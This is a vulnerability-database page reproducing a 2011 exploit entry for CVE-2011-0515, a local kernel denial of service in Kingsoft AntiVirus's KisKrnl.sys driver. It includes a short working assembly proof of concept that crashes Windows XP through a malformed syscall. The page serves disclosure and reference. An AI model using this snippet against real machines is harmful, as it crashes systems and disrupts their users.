Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Kingsoft AntiVirus 2011 SP5.2 'KisKrnl.sys' 2011.1.13.89 - Local Kernel Mode Denial of Service

Related Vulnerabilities: CVE-2011-0515  
Publish Date: 16 Jan 2011
Author: MJ0011
Source / Download Exploit 
                							

                # Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 Local Kernel Mode D.O.S Exploit
# Date: 2011-1-16
# Author: MJ0011
# Software Link: http://cd001.www.duba.net/duba/install/2011/once/KAV110114_DOWN_9_13.exe
# Version: KingSoft AntiVirus 2011 SP5.2 with KisKrnl.sys <=2011.1.13.89
# Tested on: Windows XP SP3

DETAILS:
KisKrnl.sys hook the kernel function KiFastCallEntry , but is not correctly handle user stack pointer

EXPLOIT CODE:

__asm
{
mov edx , 0x80000000
mov eax , 0x101        ;id of NtTerminateProcess under Windows XP 
int 0x2e
}

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started